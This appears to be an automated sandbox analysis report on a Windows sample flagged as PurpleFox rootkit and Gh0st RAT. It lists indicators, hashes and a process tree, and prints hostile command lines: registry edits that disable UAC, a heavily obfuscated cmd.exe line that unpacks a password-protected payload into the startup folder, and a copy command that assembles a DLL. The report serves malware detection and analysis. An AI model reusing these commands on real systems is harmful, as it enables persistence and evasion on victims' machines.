Analysis
-
max time kernel
139s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-10-2022 22:49
Static task
static1
Behavioral task
behavioral1
Sample
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Resource
win7-20220812-en
General
-
Target
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
-
Size
56KB
-
MD5
2c72f3642a2b4e17e8f54d4a8782c7f5
-
SHA1
55e76b2348a1affccc66df9389aae8b5d39d6c03
-
SHA256
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90
-
SHA512
739bcf49f3c5250baaffe20d175e351192d612ef4f1774b71727529b425d809f2fcc2e1b7cce5124baebcd8979b1c599a7d6017ec6aaca086aeca57ee5004000
-
SSDEEP
768:ITlH3i10e6PQ5WKwl0JRGdGo3DhSZhmE2fI8+ZNX:UlHy1bsKwqJGGoGhmpfIfN
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral2/memory/4528-170-0x0000000010000000-0x000000001019F000-memory.dmp purplefox_rootkit behavioral2/memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp purplefox_rootkit -
Gh0st RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4528-170-0x0000000010000000-0x000000001019F000-memory.dmp family_gh0strat behavioral2/memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp family_gh0strat -
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
k4.exek4.exeunzip.exedllhosts.exedllhosts.exek4.exepid process 1412 k4.exe 4156 k4.exe 2388 unzip.exe 4468 dllhosts.exe 4528 dllhosts.exe 2972 k4.exe -
Processes:
resource yara_rule behavioral2/memory/4528-165-0x0000000000400000-0x0000000000547000-memory.dmp upx behavioral2/memory/4528-168-0x0000000000400000-0x0000000000547000-memory.dmp upx behavioral2/memory/4528-169-0x0000000000400000-0x0000000000547000-memory.dmp upx behavioral2/memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 3 IoCs
Processes:
unzip.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\ unzip.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\browser.lnk unzip.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\browser.lnk unzip.exe -
Loads dropped DLL 1 IoCs
Processes:
dllhosts.exepid process 4468 dllhosts.exe -
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
dllhosts.exedescription ioc process File opened (read-only) \??\Q: dllhosts.exe File opened (read-only) \??\T: dllhosts.exe File opened (read-only) \??\U: dllhosts.exe File opened (read-only) \??\H: dllhosts.exe File opened (read-only) \??\I: dllhosts.exe File opened (read-only) \??\K: dllhosts.exe File opened (read-only) \??\L: dllhosts.exe File opened (read-only) \??\N: dllhosts.exe File opened (read-only) \??\R: dllhosts.exe File opened (read-only) \??\O: dllhosts.exe File opened (read-only) \??\X: dllhosts.exe File opened (read-only) \??\E: dllhosts.exe File opened (read-only) \??\F: dllhosts.exe File opened (read-only) \??\G: dllhosts.exe File opened (read-only) \??\J: dllhosts.exe File opened (read-only) \??\V: dllhosts.exe File opened (read-only) \??\W: dllhosts.exe File opened (read-only) \??\Y: dllhosts.exe File opened (read-only) \??\Z: dllhosts.exe File opened (read-only) \??\B: dllhosts.exe File opened (read-only) \??\M: dllhosts.exe File opened (read-only) \??\P: dllhosts.exe File opened (read-only) \??\S: dllhosts.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 4108 cmd.exe 1020 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
dllhosts.exedescription pid process target process PID 4468 set thread context of 4528 4468 dllhosts.exe dllhosts.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4680 4468 WerFault.exe dllhosts.exe -
Checks SCSI registry key(s) 3 TTPs 2 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
k4.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 k4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 k4.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dllhosts.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhosts.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dllhosts.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4500 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
dllhosts.exepid process 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe 4528 dllhosts.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
mmc.exepid process 3124 mmc.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
taskkill.exemmc.exemmc.exek4.exedllhosts.exedescription pid process Token: SeDebugPrivilege 4500 taskkill.exe Token: 33 4724 mmc.exe Token: SeIncBasePriorityPrivilege 4724 mmc.exe Token: 33 4724 mmc.exe Token: SeIncBasePriorityPrivilege 4724 mmc.exe Token: 33 3124 mmc.exe Token: SeIncBasePriorityPrivilege 3124 mmc.exe Token: 33 3124 mmc.exe Token: SeIncBasePriorityPrivilege 3124 mmc.exe Token: SeLoadDriverPrivilege 2972 k4.exe Token: 33 4528 dllhosts.exe Token: SeIncBasePriorityPrivilege 4528 dllhosts.exe Token: 33 4528 dllhosts.exe Token: SeIncBasePriorityPrivilege 4528 dllhosts.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exemmc.exemmc.exepid process 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe 4724 mmc.exe 4724 mmc.exe 3124 mmc.exe 3124 mmc.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.execmd.execmd.exemmc.execmd.execmd.execmd.exemmc.exedllhosts.exedescription pid process target process PID 1260 wrote to memory of 1412 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe k4.exe PID 1260 wrote to memory of 1412 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe k4.exe PID 1260 wrote to memory of 4156 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe k4.exe PID 1260 wrote to memory of 4156 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe k4.exe PID 1260 wrote to memory of 1456 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 1456 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 1456 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1456 wrote to memory of 4500 1456 cmd.exe taskkill.exe PID 1456 wrote to memory of 4500 1456 cmd.exe taskkill.exe PID 1456 wrote to memory of 4500 1456 cmd.exe taskkill.exe PID 1260 wrote to memory of 1844 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 1844 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 1844 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 3268 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 3268 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 3268 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe cmd.exe PID 1260 wrote to memory of 1868 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe WScript.exe PID 1260 wrote to memory of 1868 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe WScript.exe PID 1260 wrote to memory of 1868 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe WScript.exe PID 3268 wrote to memory of 2324 3268 cmd.exe WScript.exe PID 3268 wrote to memory of 2324 3268 cmd.exe WScript.exe PID 3268 wrote to memory of 2324 3268 cmd.exe WScript.exe PID 4724 wrote to memory of 4108 4724 mmc.exe cmd.exe PID 4724 wrote to memory of 4108 4724 mmc.exe cmd.exe PID 4108 wrote to memory of 1020 4108 cmd.exe cmd.exe PID 4108 wrote to memory of 1020 4108 cmd.exe cmd.exe PID 4108 wrote to memory of 4340 4108 cmd.exe cmd.exe PID 4108 wrote to memory of 4340 4108 cmd.exe cmd.exe PID 4340 wrote to memory of 2404 4340 cmd.exe cmd.exe PID 4340 wrote to memory of 2404 4340 cmd.exe cmd.exe PID 2404 wrote to memory of 2388 2404 cmd.exe unzip.exe PID 2404 wrote to memory of 2388 2404 cmd.exe unzip.exe PID 2404 wrote to memory of 2388 2404 cmd.exe unzip.exe PID 3124 wrote to memory of 4468 3124 mmc.exe dllhosts.exe PID 3124 wrote to memory of 4468 3124 mmc.exe dllhosts.exe PID 3124 wrote to memory of 4468 3124 mmc.exe dllhosts.exe PID 4468 wrote to memory of 4528 4468 dllhosts.exe dllhosts.exe PID 4468 wrote to memory of 4528 4468 dllhosts.exe dllhosts.exe PID 4468 wrote to memory of 4528 4468 dllhosts.exe dllhosts.exe PID 4468 wrote to memory of 4528 4468 dllhosts.exe dllhosts.exe PID 4468 wrote to memory of 4528 4468 dllhosts.exe dllhosts.exe PID 1260 wrote to memory of 2972 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe k4.exe PID 1260 wrote to memory of 2972 1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe k4.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe"C:\Users\Admin\AppData\Local\Temp\e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Users\Public\Documents\k4.exeC:/Users/Public/Documents/k4.exe2⤵
- Executes dropped EXE
-
C:\Users\Public\Documents\k4.exeC:/Users/Public/Documents/k4.exe /D2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /t /im k4.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im k4.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b C:\\Users\\Public\\Documents\\MZ.txt+C:\\Users\\Public\\Documents\\TAS.txt C:\\Users\\Public\\Documents\\TASLoginBase.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Public\Documents\2022060125.vbe2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\2022060125.vbe"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sch.vbe"2⤵
-
C:\Users\Public\Documents\k4.exe"C:\Users\Public\Documents\k4.exe" /E2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\mmc.exeC:\Windows\system32\mmc.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\system32\cmd.exe"C:\WINDOWS\system32\cmd.exe" /c ^c^M^D, , /v^:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"|,%pubLic:~ 14%MD,2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execMD , , /v:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
-
C:\Windows\system32\cmd.execMD ,3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\unzip.exeC:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"5⤵
- Executes dropped EXE
- Drops startup file
-
C:\Windows\system32\mmc.exeC:\Windows\system32\mmc.exe -Embedding1⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\dllhosts.exe"C:\Users\Public\Documents\dllhosts.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\dllhosts.exeC:\Users\Public\Documents\dllhosts.exe3⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 2523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4468 -ip 44681⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\2022060125.vbeFilesize
180B
MD5d66c7e77096d4f4c406170b6ca0ad123
SHA19bb461061c7276ebe2a493f690d72263c0da8962
SHA256cd0a0ac1315f1f473f4a42bed62fad7033fe68a3e0cf72a7b354a7e3dd78e8a8
SHA512015788021b53eb278be1238b26a01499dcb809d93ee747bc89208f8d3570a7b0b813c70ea054e70584b536da4811f0a58ef38c96a984e6b3a54654774e5c7592
-
C:\Users\Public\Documents\MZ.txtFilesize
2B
MD5ac6ad5d9b99757c3a878f2d275ace198
SHA1439baa1b33514fb81632aaf44d16a9378c5664fc
SHA2569b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
C:\Users\Public\Documents\TAS.txtFilesize
118KB
MD59efe1bc9713459a517a348502319bfa2
SHA1bffe5ad1bb71e39deb5b384ebd3220f1158e43e4
SHA256d9203f15b1d230e7a7955b7ba01d1877a4a323129c845ae31f1bf0b84aa51077
SHA51280d1e08bb880c019f852441a9af257b48a52efb81a26d2f5c89909c79f63261e62a0b68df798193d7b32d40cda56cad1f85faf6344971aab799fa9f26591af07
-
C:\Users\Public\Documents\TASLoginBase.dllFilesize
119KB
MD5b3e30cbd7f8042c7141a3957a33399a4
SHA11f808c68f20c396898ff95edd9fb154fc6f86840
SHA256edae6213d100b2a99079e7211adaefdd469edd0fa75b3146bd710a0aab83d833
SHA512b9061402648c1aba42665cf93a4e02d5aefe9ef5e409d21a715ae9e71ed4eb8de5c39bb3c47b69cd3b94a9a5e13e63c685c2cc92e4c4354be2cb2ade771547ff
-
C:\Users\Public\Documents\TASLoginBase.dllFilesize
119KB
MD5b3e30cbd7f8042c7141a3957a33399a4
SHA11f808c68f20c396898ff95edd9fb154fc6f86840
SHA256edae6213d100b2a99079e7211adaefdd469edd0fa75b3146bd710a0aab83d833
SHA512b9061402648c1aba42665cf93a4e02d5aefe9ef5e409d21a715ae9e71ed4eb8de5c39bb3c47b69cd3b94a9a5e13e63c685c2cc92e4c4354be2cb2ade771547ff
-
C:\Users\Public\Documents\dllhosts.exeFilesize
411KB
MD566557b2bd93e70a2804e983b279ab473
SHA14e58505689fd9643b5011880ce94b22cbfadf917
SHA256a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31
SHA512b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4
-
C:\Users\Public\Documents\dllhosts.exeFilesize
411KB
MD566557b2bd93e70a2804e983b279ab473
SHA14e58505689fd9643b5011880ce94b22cbfadf917
SHA256a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31
SHA512b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4
-
C:\Users\Public\Documents\dllhosts.exeFilesize
411KB
MD566557b2bd93e70a2804e983b279ab473
SHA14e58505689fd9643b5011880ce94b22cbfadf917
SHA256a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31
SHA512b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4
-
C:\Users\Public\Documents\k4.exeFilesize
892KB
MD533e29221e2825001d32f78632217d250
SHA19122127fc91790a1edb78003e9b58a9b00355ed5
SHA25665d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d
SHA51201d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93
-
C:\Users\Public\Documents\k4.exeFilesize
892KB
MD533e29221e2825001d32f78632217d250
SHA19122127fc91790a1edb78003e9b58a9b00355ed5
SHA25665d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d
SHA51201d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93
-
C:\Users\Public\Documents\k4.exeFilesize
892KB
MD533e29221e2825001d32f78632217d250
SHA19122127fc91790a1edb78003e9b58a9b00355ed5
SHA25665d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d
SHA51201d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93
-
C:\Users\Public\Documents\k4.exeFilesize
892KB
MD533e29221e2825001d32f78632217d250
SHA19122127fc91790a1edb78003e9b58a9b00355ed5
SHA25665d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d
SHA51201d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93
-
C:\Users\Public\Documents\sch.vbeFilesize
179B
MD5d569f44ce5792ee816b4182e3c7bc7da
SHA1f16a402cd6030b5c7faa5c85ade3005d66d5232a
SHA25659ff328647ccee11ad437e02b6e84c12511333553837b6fa270eefd21a3eccbf
SHA512bb0f888ff00038d1787e6cce8b09b61761d93594cbfe08d2dbf650c1802938d6df7b4b854c1af97ad405fb3b1460aab339e636852d51dc6b6849d27a5af9560b
-
C:\Users\Public\Documents\unzip.datFilesize
1KB
MD5e1fafb36f4da2c3be5dc9be1ad0b9805
SHA17d64a899e0ab62f3cd6ebf5bdade782c99c00713
SHA256a862acb112f57458ad35e5e5fc90f0d270a7600af694a6b7052d161806e5dd69
SHA5125c530b09b6459f34072dfccb7ccec5cbb791fc6cdc2633993da91fbef9c4d1172aec51ace3fb3cb8ac25b6721b4e6f5f1fd1a8fac7d95abbad8f6430e4abbc3e
-
C:\Users\Public\Documents\unzip.exeFilesize
164KB
MD575375c22c72f1beb76bea39c22a1ed68
SHA1e1652b058195db3f5f754b7ab430652ae04a50b8
SHA2568d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
SHA5121b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a
-
C:\Users\Public\Documents\unzip.exeFilesize
164KB
MD575375c22c72f1beb76bea39c22a1ed68
SHA1e1652b058195db3f5f754b7ab430652ae04a50b8
SHA2568d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
SHA5121b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a
-
C:\Users\Public\Documents\unzip.lnkFilesize
2KB
MD57503a871168c07ca47a87c933f004f66
SHA1764d09fe3b1f756a467e4a96d5cc3453732c3cfb
SHA2568a3d404f5cdd1611433ea97e8a5ebf8696d8cdcf805331201a4fb4f7203023de
SHA5124f7bbab0fcdb150cf368ab9fa2d23f26082ae1ac1d1a4cebc7ea9b2724125c7f5e013b2180a08a3f0002e416e6be5e6233f47fb7f5dbebd1b503f09a5ea24831
-
C:\Users\Public\Documents\update.lnkFilesize
